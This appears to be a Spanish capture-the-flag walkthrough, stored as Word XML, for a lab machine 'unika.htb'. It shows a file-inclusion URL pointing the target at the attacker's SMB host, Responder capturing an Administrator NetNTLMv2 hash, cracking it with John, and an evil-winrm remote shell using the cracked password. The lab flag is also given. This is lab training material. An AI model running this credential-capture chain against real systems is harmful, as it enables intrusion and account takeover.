          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="130B515D" wp14:editId="31FBB9FF">
            <wp:extent cx="5612130" cy="425450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254500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2BFA5" w14:textId="77777777" w:rsidR="00B313AD" w:rsidRPr="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Con el archivo de configuración listo, podemos proceder a iniciar Responder con python3 , pasando la interfaz para escuchar usando el indicador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41003CFB" w14:textId="211B4B8C" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">-I </w:t>
      </w:r>
      <w:r>
        <w:t>sudo python3 Responder.py -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2E0085" w14:textId="1C77964C" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3174D861" wp14:editId="3252C7BE">
            <wp:extent cx="4191192" cy="37093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8562" cy="3724731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDA33F" w14:textId="2809768D" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E15C044" wp14:editId="001F2636">
            <wp:extent cx="3502324" cy="25678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5099" cy="2569899"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DBAA7" w14:textId="6609452E" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Con el servidor Responder listo, le decimos al servidor que incluya un recurso de nuestro servidor SMB configurando el parámetro de la página de la siguiente manera a través del navegador web.</w:t>
      </w:r>
      <w:r w:rsidR="00306991">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> La ip que se coloca es la IP de Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E92FED" w14:textId="0932F0BA" w:rsidR="00B313AD" w:rsidRPr="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>http://unika.htb/?page=//</w:t>
      </w:r>
      <w:r w:rsidR="00306991">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>10.10.17.13</w:t>
      </w:r>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>/algunarchivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66143B5A" w14:textId="06C12E57" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En este caso, debido a que tenemos la libertad de especificar la dirección para el recurso compartido SMB, especificamos la dirección IP de nuestra máquina atacante. Ahora, el servidor intenta cargar el recurso desde nuestro servidor SMB y Responder captura lo suficiente para obtener NetNTLMv2. Nota: asegúrese de agregar http:// en la dirección, ya que algunos navegadores pueden optar por una búsqueda de Google en lugar de navegar a la página adecuada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306AF1E" w14:textId="3BA1615B" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B313AD">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Después de enviar nuestra carga útil a través del navegador web, aparece un error que indica que no se puede cargar el archivo solicitado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920B2B5" w14:textId="040989D7" w:rsidR="00B313AD" w:rsidRDefault="00306991" w:rsidP="00B313AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CF9A9D6" wp14:editId="6BE6D98C">
            <wp:extent cx="5612130" cy="1076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076325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="123058FA" w14:textId="1234C07B" w:rsidR="00C24168" w:rsidRDefault="00C24168" w:rsidP="00C24168">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C24168">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Pero al verificar nuestro servidor Responder de escucha, podemos ver que tenemos un NetNTLMv para el usuario Administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8E276" w14:textId="225B5FF5" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D32CB50" wp14:editId="6ACBAA91">
            <wp:extent cx="5612130" cy="5467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46735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="267D0768" w14:textId="1A9C12B1" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Y tenemos el hash, y ahora lo que tenemos que hacer es crear un archivo .txt y guardar la información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085BE14" w14:textId="50737FE7" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00306991">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>dministrator::RESPONDER:f0dc4fcfe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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C2C29" w14:textId="5041EA1A" w:rsidR="00306991" w:rsidRDefault="007529E7" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BBEC75B" wp14:editId="43B1462A">
            <wp:extent cx="5612130" cy="76073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760730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F6C32B" w14:textId="3A828F17" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>El archivo queda guardado en el escritorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB83CA6" w14:textId="66F82B7C" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F16F48F" wp14:editId="57E3BBE9">
            <wp:simplePos x="1078302" y="8643668"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5612130" cy="30670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12130" cy="306705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A915D4" w14:textId="46B7416E" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F55E383" w14:textId="1625BE96" w:rsidR="00306991" w:rsidRDefault="00306991" w:rsidP="00306991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora toca crackear la contraseña y eso lo podemos hacer con john the Ripper </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D37DD" w14:textId="3F0A5675" w:rsidR="00866B7E" w:rsidRDefault="00866B7E" w:rsidP="00866B7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00866B7E">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pasamos el archivo hash a john y desciframos la contraseña de la cuenta de administrador. El tipo de hash se identifica automáticamente mediante la herramienta de línea de comandos john .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA38A51" w14:textId="2FF5A3FD" w:rsidR="00866B7E" w:rsidRDefault="00866B7E" w:rsidP="00866B7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="223B5F20" wp14:editId="5ABD24CB">
            <wp:extent cx="4714286" cy="50476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4286" cy="504762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA0FFC4" w14:textId="7B177A33" w:rsidR="00866B7E" w:rsidRDefault="00866B7E" w:rsidP="00866B7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Con -w usaremos un diccionario de contraseñas llamado rockyou.txt después colocamos el archivo que tiene el hash que queremos crackear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB7E379" w14:textId="118629B6" w:rsidR="00866B7E" w:rsidRDefault="008D04D0" w:rsidP="00866B7E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62FAF6DE" wp14:editId="76C2DA5A">
            <wp:extent cx="4053385" cy="976426"/>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0741" cy="983016"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3278CE1D" w14:textId="182791C7" w:rsidR="00866B7E" w:rsidRPr="00937CF9" w:rsidRDefault="008D04D0" w:rsidP="00866B7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Ahora trataremos de conectarnos a una Shell de Windows usando </w:t>
      </w:r>
      <w:r w:rsidRPr="008D04D0">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Evil-WinRM que está hecho para este tipo de escenario.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usamos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.129.</w:t>
      </w:r>
      <w:r w:rsidR="007529E7" w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>.9</w:t>
      </w:r>
      <w:r w:rsidR="007529E7" w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u administra</w:t>
      </w:r>
      <w:r w:rsidR="007529E7" w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>or -p b</w:t>
      </w:r>
      <w:r w:rsidR="008C1929" w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00937CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>dminton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391B7BB" w14:textId="1FC88714" w:rsidR="007529E7" w:rsidRDefault="00AF2524" w:rsidP="007529E7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Tuvimos error con la conexión y tuvimos que volver a ejecutar la maquina virtual y para terminar el ultimo paso usaremos la IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2524">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FEF00"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="141D2B"/>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>10.129.95.234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF2C71B" w14:textId="1B58B865" w:rsidR="00AF2524" w:rsidRDefault="00AF2524" w:rsidP="00AF2524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2524">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>evil-winrm -i 10.129.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">95.234 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2524">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-u administrator -p badminton</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6ABB2" w14:textId="69B4E208" w:rsidR="00AF2524" w:rsidRDefault="00AF2524" w:rsidP="00AF2524">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21AAA366" wp14:editId="04ABC619">
            <wp:extent cx="4572000" cy="997377"/>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93605" cy="1002090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B504CCF" w14:textId="6F98516D" w:rsidR="00AF2524" w:rsidRDefault="00AF2524" w:rsidP="00AF2524">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2524">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Temenos acceso a la shell a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>hora podemos buscar la bandera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B8322" w14:textId="2EC0D7C5" w:rsidR="00180538" w:rsidRDefault="00180538" w:rsidP="00180538">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D336B6" wp14:editId="1CE24013">
            <wp:extent cx="2474754" cy="221776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5452" cy="2227348"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37226341" w14:textId="07692E55" w:rsidR="00180538" w:rsidRPr="00180538" w:rsidRDefault="00180538" w:rsidP="00180538">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Bandera: </w:t>
      </w:r>
      <w:r w:rsidRPr="00180538">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>ea81b7afddd03efaa0945333ed147fac</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00180538" w:rsidRPr="00180538">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EC3A8" w14:textId="77777777" w:rsidR="00E30A02" w:rsidRDefault="00E30A02" w:rsidP="000560A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15BED47C" w14:textId="77777777" w:rsidR="00E30A02" w:rsidRDefault="00E30A02" w:rsidP="000560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1F753" w14:textId="77777777" w:rsidR="00E30A02" w:rsidRDefault="00E30A02" w:rsidP="000560A5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1823698D" w14:textId="77777777" w:rsidR="00E30A02" w:rsidRDefault="00E30A02" w:rsidP="000560A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01922"/>
    <w:rsid w:val="000560A5"/>
    <w:rsid w:val="00056D48"/>
    <w:rsid w:val="00056F1A"/>
    <w:rsid w:val="00101922"/>
    <w:rsid w:val="00121D7D"/>
    <w:rsid w:val="00171646"/>
    <w:rsid w:val="00180538"/>
    <w:rsid w:val="001A6A3B"/>
    <w:rsid w:val="001C5E45"/>
    <w:rsid w:val="001E647F"/>
    <w:rsid w:val="002249F0"/>
    <w:rsid w:val="002D03AB"/>
    <w:rsid w:val="00306991"/>
    <w:rsid w:val="00346288"/>
    <w:rsid w:val="00376305"/>
    <w:rsid w:val="00391220"/>
    <w:rsid w:val="003D2AE6"/>
    <w:rsid w:val="00415955"/>
    <w:rsid w:val="004271F5"/>
    <w:rsid w:val="004564A2"/>
    <w:rsid w:val="0048347C"/>
    <w:rsid w:val="0049140A"/>
    <w:rsid w:val="004C1F12"/>
    <w:rsid w:val="004D087C"/>
    <w:rsid w:val="0051681D"/>
    <w:rsid w:val="006349ED"/>
    <w:rsid w:val="006D5440"/>
    <w:rsid w:val="006F0ED4"/>
    <w:rsid w:val="007007B0"/>
    <w:rsid w:val="0071381E"/>
    <w:rsid w:val="0074381C"/>
    <w:rsid w:val="007529E7"/>
    <w:rsid w:val="00801759"/>
    <w:rsid w:val="008166EE"/>
    <w:rsid w:val="00817D70"/>
    <w:rsid w:val="008277E8"/>
    <w:rsid w:val="008356AA"/>
    <w:rsid w:val="00843561"/>
    <w:rsid w:val="00847932"/>
    <w:rsid w:val="00866B7E"/>
    <w:rsid w:val="008C1929"/>
    <w:rsid w:val="008C7755"/>
    <w:rsid w:val="008D04D0"/>
    <w:rsid w:val="008D4BD5"/>
    <w:rsid w:val="008F6764"/>
    <w:rsid w:val="00923BE0"/>
    <w:rsid w:val="00933809"/>
    <w:rsid w:val="00937CF9"/>
    <w:rsid w:val="009F011D"/>
    <w:rsid w:val="009F0B19"/>
    <w:rsid w:val="00A310D8"/>
    <w:rsid w:val="00AA18A6"/>
    <w:rsid w:val="00AF2524"/>
    <w:rsid w:val="00B22440"/>
    <w:rsid w:val="00B313AD"/>
    <w:rsid w:val="00B33629"/>
    <w:rsid w:val="00B776FE"/>
    <w:rsid w:val="00BB0BF5"/>
    <w:rsid w:val="00BF7E67"/>
    <w:rsid w:val="00C24168"/>
    <w:rsid w:val="00C662A2"/>
    <w:rsid w:val="00CD4187"/>
    <w:rsid w:val="00D40B97"/>
    <w:rsid w:val="00D83719"/>
    <w:rsid w:val="00D949F9"/>
    <w:rsid w:val="00DA2FE6"/>
    <w:rsid w:val="00DB2C4A"/>
    <w:rsid w:val="00DE5009"/>
    <w:rsid w:val="00E30A02"/>
    <w:rsid w:val="00E836F0"/>
    <w:rsid w:val="00E86ECF"/>
    <w:rsid w:val="00E8756E"/>
    <w:rsid w:val="00F8410B"/>
    <w:rsid w:val="00FB5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18E2F"/>
  <w15:docId w15:val="{273592D2-C1E2-4B02-8D82-D5D8E2F5D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560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60A5"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000560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60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10413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="469716486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1381594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653</TotalTime>
  <Pages>8</Pages>
  <Words>950</Words>
  <Characters>5230</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Paz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Angel Paz</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-06T22:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-08T02:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>